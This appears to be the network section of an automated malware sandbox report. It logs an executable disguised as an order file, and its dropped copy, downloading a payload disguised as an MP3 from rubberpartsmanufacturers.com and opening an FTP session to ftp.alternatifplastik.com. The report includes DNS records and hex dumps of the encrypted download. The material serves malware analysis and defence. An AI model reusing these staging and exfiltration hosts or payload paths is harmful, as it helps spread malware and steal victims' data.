                                        Oct 9, 2024 10:51:26.664854050 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.664885998 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.664913893 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666064024 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666122913 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666142941 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666153908 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666177988 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666188002 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666194916 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666199923 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666243076 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666304111 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666361094 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666367054 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666388035 CEST44349742103.191.208.122192.168.2.4
                                        Oct 9, 2024 10:51:26.666412115 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.666441917 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:26.674438953 CEST49742443192.168.2.4103.191.208.122
                                        Oct 9, 2024 10:51:29.246506929 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:29.251547098 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:29.252777100 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:29.896641016 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:29.923542023 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:29.935475111 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.158037901 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.167351007 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:30.172322989 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.409931898 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.410108089 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:30.415081024 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.633862972 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.634056091 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:30.639172077 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.849375010 CEST4974021192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:30.858278990 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:30.858453035 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:30.863365889 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.082277060 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.082462072 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.087609053 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.306466103 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.307218075 CEST4974450958192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.312223911 CEST50958497445.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.312374115 CEST4974450958192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.312442064 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.317363024 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.936820030 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.937083006 CEST4974450958192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.937148094 CEST4974450958192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.941932917 CEST50958497445.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.942528009 CEST50958497445.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:31.942584038 CEST4974450958192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:31.988519907 CEST4974321192.168.2.45.2.84.236
                                        Oct 9, 2024 10:51:32.161956072 CEST21497435.2.84.236192.168.2.4
                                        Oct 9, 2024 10:51:32.207269907 CEST4974321192.168.2.45.2.84.236
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 9, 2024 10:50:58.216767073 CEST5357353192.168.2.41.1.1.1
                                        Oct 9, 2024 10:50:58.743102074 CEST53535731.1.1.1192.168.2.4
                                        Oct 9, 2024 10:51:04.537235975 CEST6357753192.168.2.41.1.1.1
                                        Oct 9, 2024 10:51:04.657974958 CEST53635771.1.1.1192.168.2.4
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 9, 2024 10:50:58.216767073 CEST192.168.2.41.1.1.10xb842Standard query (0)rubberpartsmanufacturers.comA (IP address)IN (0x0001)false
                                        Oct 9, 2024 10:51:04.537235975 CEST192.168.2.41.1.1.10xe916Standard query (0)ftp.alternatifplastik.comA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 9, 2024 10:50:58.743102074 CEST1.1.1.1192.168.2.40xb842No error (0)rubberpartsmanufacturers.com103.191.208.122A (IP address)IN (0x0001)false
                                        Oct 9, 2024 10:51:04.657974958 CEST1.1.1.1192.168.2.40xe916No error (0)ftp.alternatifplastik.com5.2.84.236A (IP address)IN (0x0001)false
                                        • rubberpartsmanufacturers.com
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449730103.191.208.1224437444C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-09 08:51:00 UTC94OUTGET /omani/Mrlres.mp3 HTTP/1.1
                                        Host: rubberpartsmanufacturers.com
                                        Connection: Keep-Alive
                                        2024-10-09 08:51:00 UTC235INHTTP/1.1 200 OK
                                        Date: Wed, 09 Oct 2024 08:51:00 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Last-Modified: Wed, 09 Oct 2024 07:54:24 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 958480
                                        Content-Type: audio/mpeg
                                        2024-10-09 08:51:00 UTC7957INData Raw: 88 14 a7 17 bd e8 67 29 50 62 e3 5e 42 a4 4a 34 19 52 a8 2c c3 23 95 4e 6a 7a 5e d8 17 90 c0 74 6f 69 9f d7 1d c0 6e 61 68 4a b7 48 b5 82 74 65 07 04 da ca 2b 86 46 d2 82 dc 75 03 96 e3 fa ee bc ef 53 e7 e5 b7 66 bb f0 92 b6 10 7d 8b 6f 52 55 38 be b9 ff d8 3f 84 1e c3 f5 84 44 f2 03 86 7e f4 7e 36 74 95 f7 73 de 1a 4a 72 4c d2 4d 6c bf 8a 46 c0 b4 0f a0 9e 64 01 60 e6 e6 5e 2f 3a e2 4e 31 25 6a 78 91 cb e5 6d c6 c0 3b ef fe 00 67 12 ce ff 25 4f d1 d1 7f e5 9f 7e 56 4a 71 40 91 13 1a 1e 94 dd 1a eb b0 72 cf d8 f9 3f bf b8 64 e4 c8 ea ea 58 18 cd 1f 3d 6b 6e 4a ff 5c 6e e0 9a dc d1 3d 1b 49 f3 b7 e5 38 9e de d6 81 d5 02 6b e3 2d f2 66 dc 94 b9 10 8a b0 eb 88 28 c5 c0 aa c1 85 9e 4b 90 27 ee 2d e6 b8 85 0d eb b5 49 fa a9 33 90 79 74 f0 2d 43 cd 2f 68 e5 bc
                                        Data Ascii: g)Pb^BJ4R,#Njz^toinahJHte+FuSf}oRU8?D~~6tsJrLMlFd`^/:N1%jxm;g%O~VJq@r?dX=knJ\n=I8k-f(K'-I3yt-C/h
                                        2024-10-09 08:51:00 UTC8000INData Raw: c8 90 a7 89 1d e7 6d cd 21 aa 28 46 f1 f2 c5 a2 13 0b 1d 81 19 60 4f 58 2f 8c b2 29 1b 98 b0 4b 7f dd 7b 81 f1 d9 d3 a5 e7 8d 26 88 4a 28 6b f1 05 8f b8 0b 26 de 17 21 90 ea 1c 8e ef fb f0 2f 7f 09 ad 64 78 0d ae 33 a6 38 12 c4 a8 84 dc 0f 11 28 62 1d 06 10 29 66 cf c5 28 bf 0d df cc 91 3d 0b 02 b7 5f 16 f9 16 e4 5d fb ee 39 d1 8c e4 4a a0 99 e6 b2 d5 d6 d2 41 8c 75 f2 fc e4 fc c4 1b 5d a7 0f 23 8f 71 bf 4a 1d 9b 90 4a ce ca fc a4 7c 34 57 0d 7a cd 08 92 de 00 c1 38 f2 93 a8 9e ba dd 6e 66 32 8f c0 74 73 84 7f bd c9 29 dc 31 7b f8 8f 1f 2f df fd 70 bc 5c 32 de b3 52 f7 3c ed 50 d5 3c 4e 97 30 25 42 ae 1a 9a d3 cf 28 c8 09 15 04 d6 13 bd db 13 b3 15 93 ae 09 57 1b 0d 4e ee 82 37 8b 59 bf 8d 02 f5 4e a1 fe b3 3c 79 c1 79 9e a7 1e 92 7e 82 07 49 3d a3 e2 5f
                                        Data Ascii: m!(F`OX/)K{&J(k&!/dx38(b)f(=_]9JAu]#qJJ|4Wz8nf2ts)1{/p\2R<P<N0%B(WN7YN<yy~I=_
                                        2024-10-09 08:51:00 UTC8000INData Raw: ae 68 01 cb 0b d0 d6 62 67 49 43 55 da 28 9f cd 0b 86 80 d0 68 3b 19 55 7b 77 1f a0 8f 87 12 fe c5 e1 64 0c e7 a5 cd f5 9f b2 30 f4 89 5a 86 f7 37 6e 8e 77 ed f3 28 c4 8d e4 83 50 46 c6 83 ae 87 ae 51 e6 96 b9 85 f1 77 c8 e8 c6 ba 3b 1a 9b 06 57 a7 a2 23 8c da 85 c7 f2 5a 05 7e d7 04 59 25 df e1 03 87 64 3f 47 3e a7 7b 9e 2b 75 f5 99 41 b9 7e dc de 5a b3 d6 42 82 1c 83 2e cc a8 65 9c 2e 63 0b a7 3c 2e b4 c0 b8 a0 61 f4 80 44 15 65 d7 7d 96 53 58 48 8c 40 1f 08 12 76 b1 c2 48 b3 06 06 fe e2 25 65 ed 39 60 19 40 ae e7 b1 29 14 c3 f3 dc 1b 07 d5 33 66 2b 9a 83 af bb 43 90 3f 92 9a 28 b0 c2 2e 63 95 ad 37 f2 70 69 fa 9e 78 23 b1 c7 e6 33 7b db de fa a9 23 44 22 44 ec 3a d7 fa 74 81 24 02 3a 2b 9b bb 7f 4f 82 49 ce 2d 9f 44 38 bb 3d c7 cb b6 e2 9e 3f 3e ff da
                                        Data Ascii: hbgICU(h;U{wd0Z7nw(PFQw;W#Z~Y%d?G>{+uA~ZB.e.c<.aDe}SXH@vH%e9`@)3f+C?(.c7pix#3{#D"D:t$:+OI-D8=?>
                                        2024-10-09 08:51:00 UTC8000INData Raw: 7f 14 8f 52 2b da 02 c9 83 ce 12 07 6f c7 86 ef 36 e4 a9 2f 40 b8 28 a6 a0 b1 41 f3 6c 76 fc 63 31 13 72 c8 9e 1a eb f5 d8 0e a0 c9 82 e8 ba 28 83 61 10 d7 32 9a 28 16 ea 70 2e 8e c1 35 28 cd 9d 8d cb d0 4c a9 0d 55 8c 39 b6 a2 ce 0c af f2 dd d7 8f c2 85 f9 a6 4a 7a 0b d6 5a 2b 35 f2 32 d1 13 ca 2a a6 92 f2 46 6e 3f ef af c7 a1 12 f7 7e 75 db 23 b8 fa 86 dc fb ed c0 8a 05 5d 18 bc cf ac 3c 77 1d 15 99 0b e1 3f 50 3c b6 1c 64 bf ed 0b f7 99 59 48 b8 e6 fc 5d 09 c8 7e dc e0 55 83 3b 94 53 75 aa 40 24 60 c4 4b 8f 40 e8 26 16 76 0f e5 9b 84 82 15 2f bb 72 ac e8 be df 81 00 9c db 6d c3 b9 9c 2a 5f f8 f2 d4 e8 0b fc b7 ec 00 b8 3b b9 e2 b5 c8 ee 7b 45 94 f9 d7 b7 59 45 be d4 a8 31 60 a4 50 e7 b7 38 84 5c cd 11 dd d3 6f 38 d3 5e 91 45 3f dc c8 77 73 6c 11 58 49
                                        Data Ascii: R+o6/@(Alvc1r(a2(p.5(LU9JzZ+52*Fn?~u#]<w?P<dYH]~U;Su@$`K@&v/rm*_;{EYE1`P8\o8^E?wslXI
                                        2024-10-09 08:51:00 UTC8000INData Raw: 52 cd 26 4a 45 b4 aa a5 f5 fe c1 d9 18 98 34 36 d1 6d 24 f5 07 7c 95 de 24 4a e8 cd e0 7c 64 cc 60 8a 41 32 33 7e 27 b1 26 50 fa 49 a5 0d 07 f0 df 0e 43 30 31 c9 4a e9 8e 44 49 a9 b9 c7 15 4c a2 4e da 91 0e 0e bb 13 58 3d 12 20 5b 5a a7 05 17 74 bb 05 7c 20 5d d9 b8 53 f7 af 4a c1 83 cc be dd a0 45 89 48 97 0a 83 84 8c fc 19 4e 63 77 01 44 86 9b d9 e7 42 42 eb 25 c0 a0 ae 6e fc 86 5e 2d 81 48 66 a7 a5 2c 9b b1 f2 39 0f e8 b6 5d a8 b3 00 57 39 74 51 9f 58 a0 6a c0 ca 9a 86 65 35 62 83 09 66 b9 20 a9 cf 0a c8 cc b6 25 0f 1a 46 20 55 f2 c5 a7 bd f7 0d 1e 21 68 d3 d0 65 93 fb e5 ae 02 2c 89 03 e5 bf 27 de e6 37 14 16 b5 4e 27 18 86 8a 2b 1a ee 8f c0 b9 cf c6 12 7f 1e c4 bd a1 36 99 b3 28 7e 4f c2 93 8c 94 53 ce 20 17 3f 55 96 c4 12 ca 25 77 1f 27 27 a7 4b c5
                                        Data Ascii: R&JE46m$|$J|d`A23~'&PIC01JDILNX= [Zt| ]SJEHNcwDBB%n^-Hf,9]W9tQXje5bf %F U!he,'7N'+6(~OS ?U%w''K
                                        2024-10-09 08:51:00 UTC8000INData Raw: d3 88 53 21 ff 80 59 06 0b 8e 4e e0 04 6d dd 9a a1 d5 1b 66 65 ad cb bf 4a b3 75 37 b6 5c 6e c8 bb 87 cc 83 69 cb 8e f9 63 f3 42 c4 94 9b 71 76 e2 40 e7 21 f8 6c 43 1d 57 e5 79 8e 7f 8c 8f e0 9e 95 41 82 93 f0 27 32 7f f2 ad ee e6 1b 23 d6 d7 5a 32 32 40 42 ea e0 f8 b2 d2 75 d3 15 5a 61 d8 3e 92 9c 60 d3 a5 62 94 b6 d9 f8 ac d3 65 3d cb af f1 a0 1b b0 40 7a d6 4a 34 83 c4 62 39 fb 11 9c ea 7d 26 d9 01 84 7c d5 62 cd 6d 6b be da a7 eb a9 00 1d 75 26 91 43 df 7a 38 21 8c 1a 19 57 f9 42 83 a6 13 9b e4 f3 f6 82 a9 27 51 fa c0 b4 d4 f3 ec b1 65 97 f6 1e 9f 85 35 49 f8 ad 28 73 6d 82 47 e9 31 2c bc e4 e9 82 c0 33 bb 0c 80 1e eb 40 ef 98 44 25 d2 69 21 77 0f 0f 23 09 89 ae 1d 7e 35 c9 63 7a fa 95 a4 f7 ea f8 69 73 27 1c 6d be b1 ed 57 08 4d db 7d a1 d4 9f 20 c4
                                        Data Ascii: S!YNmfeJu7\nicBqv@!lCWyA'2#Z22@BuZa>`be=@zJ4b9}&|bmku&Cz8!WB'Qe5I(smG1,3@D%i!w#~5czis'mWM}
                                        2024-10-09 08:51:00 UTC8000INData Raw: 3e 7d 0a e2 eb 1c 91 65 2e fb b7 02 aa cf ca 43 2c 4f 8f a0 35 ab e1 57 9e 88 8d e4 6f 61 db 43 90 15 89 ce 1e 91 1e 00 a2 02 92 95 96 b0 6f 95 a8 d4 ca fa e5 d3 54 60 1c 4c ec 49 1d 34 98 25 b9 50 21 ae 55 02 a5 1e f0 da 8e 0d f8 cd a2 69 1c 16 d7 15 ed 3f 1d 2c bd a8 95 ea af 47 a0 31 f6 e3 a6 da 94 bb 4c 5e fe 55 de 79 d3 c3 0f a9 76 d3 79 e3 5d 2d 8e 1c d0 82 93 fc d2 76 85 9e a3 ca 15 44 57 b1 d5 1a a7 99 d0 ef b5 65 77 ad dc 4f 56 31 06 4a b3 88 33 e8 56 3a 48 7c f9 13 ab 1e 6e 1e 29 f5 2b 4f 35 c5 0f 29 2a 6f 2c 98 7e 73 77 9b 9c 3f 2f 49 51 85 51 2d 1c 12 eb 39 93 0c 9f 41 71 e1 19 5f e1 f3 52 43 fd da 2d ef 2d c4 b7 a1 45 c7 c3 f3 19 58 7d c1 cc 3f e4 08 4c 71 d8 56 8b 6e 4a 14 e7 58 46 4c ea e2 50 73 b4 34 96 52 17 a8 50 4a 3f 61 43 7e a1 75 7e
                                        Data Ascii: >}e.C,O5WoaCoT`LI4%P!Ui?,G1L^Uyvy]-vDWewOV1J3V:H|n)+O5)*o,~sw?/IQQ-9Aq_RC--EX}?LqVnJXFLPs4RPJ?aC~u~
                                        2024-10-09 08:51:00 UTC8000INData Raw: 43 89 fc ce b6 1f 53 39 3d 1e dd 34 fb 1f ea f1 b6 83 38 aa 0b 08 30 a0 af b1 18 dd f0 41 03 b1 60 b8 14 9a f7 42 2a 39 07 9a c0 db 07 78 ec 3e da 46 b5 2d 04 ec e3 9f 16 4e 08 e0 70 37 6c 09 7a 04 05 5c 13 89 ed 13 69 ff 0b 7f 11 5e 8f df 74 37 17 ee b6 64 b5 50 f5 ca 6e e4 bc be 64 02 30 00 b9 df f4 b8 c9 f0 5b 12 e8 f1 4a cd 48 d1 d2 cd 08 a3 5f f6 ee 09 50 0c 2d a7 5d 8a cc 67 cc ef 1d 88 19 79 5b 2a 39 e4 79 51 b0 68 63 ee 6d b9 66 9a 0c 4c d9 c6 7d 28 5d e6 9d 07 81 3d 94 e1 f7 8b 2d ac 0b 7a a7 44 85 a0 ee f7 fe 45 b0 38 64 af 57 98 56 1b 12 aa a2 58 55 87 3b 9d 72 dd 9f da 4d ec 50 7d 31 3c 9c 3d 2a 76 22 50 bc ec b2 b3 4d a2 87 47 49 13 13 05 cc 5b cf 7d d9 b3 31 8e e7 62 4a 41 21 12 87 e3 9d ca e2 8b bf 58 ab 2f c1 42 7c a5 0c 0f 90 6f 93 ad 64
                                        Data Ascii: CS9=480A`B*9x>F-Np7lz\i^t7dPnd0[JH_P-]gy[*9yQhcmfL}(]=-zDE8dWVXU;rMP}1<=*v"PMGI[}1bJA!X/B|od
                                        2024-10-09 08:51:00 UTC8000INData Raw: bb ca 76 1d f5 7c 55 6b 58 74 c6 32 63 37 fb 1d f2 d1 a7 e8 a0 9c f2 bb f8 ec 5e f4 86 38 44 4e c6 04 93 be cb 87 9f 96 1e 8e a0 bf 1a 1c 3c fb 6e ad f8 68 02 04 d3 53 5f b9 bf f0 ab 24 8b 01 98 fa 30 fc 97 78 3d 76 6f e6 6f b0 8f 25 6d b4 3a e1 16 71 3e b5 17 b6 41 98 31 78 36 40 1c a6 19 20 55 89 99 e9 da 4d 84 72 cf 4e 98 9c b8 c2 8a 2b d1 12 98 ba 13 db 4f 33 ac c2 9f 2c b6 ef 3f f4 54 ed 4a d4 7a 05 41 c3 e6 b4 1b db 02 03 19 e0 ff 79 1b 86 ed 4f d7 b7 29 3d c0 d0 82 76 f4 37 5d 0c e6 73 4c be c6 7d ed de f8 d6 a7 ff 28 72 96 36 64 84 d3 4b 1e 78 44 f1 bc 62 64 58 16 90 6e 57 63 1d 4e 19 10 ba 63 84 32 42 7d e6 c0 2b 41 8a 3e eb bf 4c 84 ad aa 6c a1 a2 3e 56 23 71 4a 14 1d b0 b9 3f fa da 5b fd 99 f6 4b b2 0c 0d e4 88 1d ca 5b 75 68 dc 94 98 5f 59 0f
                                        Data Ascii: v|UkXt2c7^8DN<nhS_$0x=voo%m:q>A1x6@ UMrN+O3,?TJzAyO)=v7]sL}(r6dKxDbdXnWcNc2B}+A>Ll>V#qJ?[K[uh_Y
                                        2024-10-09 08:51:00 UTC8000INData Raw: 8a 0b 21 00 87 bc 1a 06 7f 57 bd 89 8c 18 4d b5 17 4c b6 e6 f7 ac e1 71 09 a5 e1 7f 86 4a d5 1b 4f 02 2d 8f c9 c4 5a e5 79 5c b4 22 4e 81 62 84 aa 93 87 4b a6 b7 ec ea 16 4c a3 81 df f6 b1 9e c8 32 b2 b0 4f 60 e5 cd e2 47 09 ea fb ff cb 64 b9 05 15 93 11 12 72 c7 28 43 21 fb a2 2e f0 99 ed 75 af 32 fd 17 53 85 eb b4 b5 09 f5 da 52 9c cc 9e 35 10 f2 4c 6a d7 33 32 01 c7 15 c7 9c 29 0a 6e 60 f2 40 a8 75 d4 5e 69 97 4c 67 54 5b ae bd 56 ee af b3 95 e1 fd a3 ad 73 ba 98 b6 15 05 fb b5 2c 53 2f d5 76 d4 0a af 14 43 4d c3 06 5c 12 2d 10 15 5d c9 a8 92 b4 7b 12 fb 29 fa 9d b1 bf 43 5a 7e ed 57 cf 7e ef 29 d4 5c ea 37 f4 cd 7f 7e 5b e4 92 02 a1 0e b0 5c 8c 95 f5 27 57 49 02 9c d4 f4 c9 f1 4d 46 e1 d5 6e c6 d1 8d ea 8e 3f 96 09 1a dd 1a 83 a5 e6 12 b5 0d 86 34 3c
                                        Data Ascii: !WMLqJO-Zy\"NbKL2O`Gdr(C!.u2SR5Lj32)n`@u^iLgT[Vs,S/vCM\-]{)CZ~W~)\7~[\'WIMFn?4<


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.449735103.191.208.1224437744C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-09 08:51:16 UTC94OUTGET /omani/Mrlres.mp3 HTTP/1.1
                                        Host: rubberpartsmanufacturers.com
                                        Connection: Keep-Alive
                                        2024-10-09 08:51:17 UTC235INHTTP/1.1 200 OK
                                        Date: Wed, 09 Oct 2024 08:51:17 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Last-Modified: Wed, 09 Oct 2024 07:54:24 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 958480
                                        Content-Type: audio/mpeg
                                        2024-10-09 08:51:17 UTC7957INData Raw: 88 14 a7 17 bd e8 67 29 50 62 e3 5e 42 a4 4a 34 19 52 a8 2c c3 23 95 4e 6a 7a 5e d8 17 90 c0 74 6f 69 9f d7 1d c0 6e 61 68 4a b7 48 b5 82 74 65 07 04 da ca 2b 86 46 d2 82 dc 75 03 96 e3 fa ee bc ef 53 e7 e5 b7 66 bb f0 92 b6 10 7d 8b 6f 52 55 38 be b9 ff d8 3f 84 1e c3 f5 84 44 f2 03 86 7e f4 7e 36 74 95 f7 73 de 1a 4a 72 4c d2 4d 6c bf 8a 46 c0 b4 0f a0 9e 64 01 60 e6 e6 5e 2f 3a e2 4e 31 25 6a 78 91 cb e5 6d c6 c0 3b ef fe 00 67 12 ce ff 25 4f d1 d1 7f e5 9f 7e 56 4a 71 40 91 13 1a 1e 94 dd 1a eb b0 72 cf d8 f9 3f bf b8 64 e4 c8 ea ea 58 18 cd 1f 3d 6b 6e 4a ff 5c 6e e0 9a dc d1 3d 1b 49 f3 b7 e5 38 9e de d6 81 d5 02 6b e3 2d f2 66 dc 94 b9 10 8a b0 eb 88 28 c5 c0 aa c1 85 9e 4b 90 27 ee 2d e6 b8 85 0d eb b5 49 fa a9 33 90 79 74 f0 2d 43 cd 2f 68 e5 bc
                                        Data Ascii: g)Pb^BJ4R,#Njz^toinahJHte+FuSf}oRU8?D~~6tsJrLMlFd`^/:N1%jxm;g%O~VJq@r?dX=knJ\n=I8k-f(K'-I3yt-C/h
                                        2024-10-09 08:51:17 UTC8000INData Raw: c8 90 a7 89 1d e7 6d cd 21 aa 28 46 f1 f2 c5 a2 13 0b 1d 81 19 60 4f 58 2f 8c b2 29 1b 98 b0 4b 7f dd 7b 81 f1 d9 d3 a5 e7 8d 26 88 4a 28 6b f1 05 8f b8 0b 26 de 17 21 90 ea 1c 8e ef fb f0 2f 7f 09 ad 64 78 0d ae 33 a6 38 12 c4 a8 84 dc 0f 11 28 62 1d 06 10 29 66 cf c5 28 bf 0d df cc 91 3d 0b 02 b7 5f 16 f9 16 e4 5d fb ee 39 d1 8c e4 4a a0 99 e6 b2 d5 d6 d2 41 8c 75 f2 fc e4 fc c4 1b 5d a7 0f 23 8f 71 bf 4a 1d 9b 90 4a ce ca fc a4 7c 34 57 0d 7a cd 08 92 de 00 c1 38 f2 93 a8 9e ba dd 6e 66 32 8f c0 74 73 84 7f bd c9 29 dc 31 7b f8 8f 1f 2f df fd 70 bc 5c 32 de b3 52 f7 3c ed 50 d5 3c 4e 97 30 25 42 ae 1a 9a d3 cf 28 c8 09 15 04 d6 13 bd db 13 b3 15 93 ae 09 57 1b 0d 4e ee 82 37 8b 59 bf 8d 02 f5 4e a1 fe b3 3c 79 c1 79 9e a7 1e 92 7e 82 07 49 3d a3 e2 5f
                                        Data Ascii: m!(F`OX/)K{&J(k&!/dx38(b)f(=_]9JAu]#qJJ|4Wz8nf2ts)1{/p\2R<P<N0%B(WN7YN<yy~I=_
                                        2024-10-09 08:51:17 UTC8000INData Raw: ae 68 01 cb 0b d0 d6 62 67 49 43 55 da 28 9f cd 0b 86 80 d0 68 3b 19 55 7b 77 1f a0 8f 87 12 fe c5 e1 64 0c e7 a5 cd f5 9f b2 30 f4 89 5a 86 f7 37 6e 8e 77 ed f3 28 c4 8d e4 83 50 46 c6 83 ae 87 ae 51 e6 96 b9 85 f1 77 c8 e8 c6 ba 3b 1a 9b 06 57 a7 a2 23 8c da 85 c7 f2 5a 05 7e d7 04 59 25 df e1 03 87 64 3f 47 3e a7 7b 9e 2b 75 f5 99 41 b9 7e dc de 5a b3 d6 42 82 1c 83 2e cc a8 65 9c 2e 63 0b a7 3c 2e b4 c0 b8 a0 61 f4 80 44 15 65 d7 7d 96 53 58 48 8c 40 1f 08 12 76 b1 c2 48 b3 06 06 fe e2 25 65 ed 39 60 19 40 ae e7 b1 29 14 c3 f3 dc 1b 07 d5 33 66 2b 9a 83 af bb 43 90 3f 92 9a 28 b0 c2 2e 63 95 ad 37 f2 70 69 fa 9e 78 23 b1 c7 e6 33 7b db de fa a9 23 44 22 44 ec 3a d7 fa 74 81 24 02 3a 2b 9b bb 7f 4f 82 49 ce 2d 9f 44 38 bb 3d c7 cb b6 e2 9e 3f 3e ff da
                                        Data Ascii: hbgICU(h;U{wd0Z7nw(PFQw;W#Z~Y%d?G>{+uA~ZB.e.c<.aDe}SXH@vH%e9`@)3f+C?(.c7pix#3{#D"D:t$:+OI-D8=?>
                                        2024-10-09 08:51:17 UTC8000INData Raw: 7f 14 8f 52 2b da 02 c9 83 ce 12 07 6f c7 86 ef 36 e4 a9 2f 40 b8 28 a6 a0 b1 41 f3 6c 76 fc 63 31 13 72 c8 9e 1a eb f5 d8 0e a0 c9 82 e8 ba 28 83 61 10 d7 32 9a 28 16 ea 70 2e 8e c1 35 28 cd 9d 8d cb d0 4c a9 0d 55 8c 39 b6 a2 ce 0c af f2 dd d7 8f c2 85 f9 a6 4a 7a 0b d6 5a 2b 35 f2 32 d1 13 ca 2a a6 92 f2 46 6e 3f ef af c7 a1 12 f7 7e 75 db 23 b8 fa 86 dc fb ed c0 8a 05 5d 18 bc cf ac 3c 77 1d 15 99 0b e1 3f 50 3c b6 1c 64 bf ed 0b f7 99 59 48 b8 e6 fc 5d 09 c8 7e dc e0 55 83 3b 94 53 75 aa 40 24 60 c4 4b 8f 40 e8 26 16 76 0f e5 9b 84 82 15 2f bb 72 ac e8 be df 81 00 9c db 6d c3 b9 9c 2a 5f f8 f2 d4 e8 0b fc b7 ec 00 b8 3b b9 e2 b5 c8 ee 7b 45 94 f9 d7 b7 59 45 be d4 a8 31 60 a4 50 e7 b7 38 84 5c cd 11 dd d3 6f 38 d3 5e 91 45 3f dc c8 77 73 6c 11 58 49
                                        Data Ascii: R+o6/@(Alvc1r(a2(p.5(LU9JzZ+52*Fn?~u#]<w?P<dYH]~U;Su@$`K@&v/rm*_;{EYE1`P8\o8^E?wslXI
                                        2024-10-09 08:51:17 UTC8000INData Raw: 52 cd 26 4a 45 b4 aa a5 f5 fe c1 d9 18 98 34 36 d1 6d 24 f5 07 7c 95 de 24 4a e8 cd e0 7c 64 cc 60 8a 41 32 33 7e 27 b1 26 50 fa 49 a5 0d 07 f0 df 0e 43 30 31 c9 4a e9 8e 44 49 a9 b9 c7 15 4c a2 4e da 91 0e 0e bb 13 58 3d 12 20 5b 5a a7 05 17 74 bb 05 7c 20 5d d9 b8 53 f7 af 4a c1 83 cc be dd a0 45 89 48 97 0a 83 84 8c fc 19 4e 63 77 01 44 86 9b d9 e7 42 42 eb 25 c0 a0 ae 6e fc 86 5e 2d 81 48 66 a7 a5 2c 9b b1 f2 39 0f e8 b6 5d a8 b3 00 57 39 74 51 9f 58 a0 6a c0 ca 9a 86 65 35 62 83 09 66 b9 20 a9 cf 0a c8 cc b6 25 0f 1a 46 20 55 f2 c5 a7 bd f7 0d 1e 21 68 d3 d0 65 93 fb e5 ae 02 2c 89 03 e5 bf 27 de e6 37 14 16 b5 4e 27 18 86 8a 2b 1a ee 8f c0 b9 cf c6 12 7f 1e c4 bd a1 36 99 b3 28 7e 4f c2 93 8c 94 53 ce 20 17 3f 55 96 c4 12 ca 25 77 1f 27 27 a7 4b c5
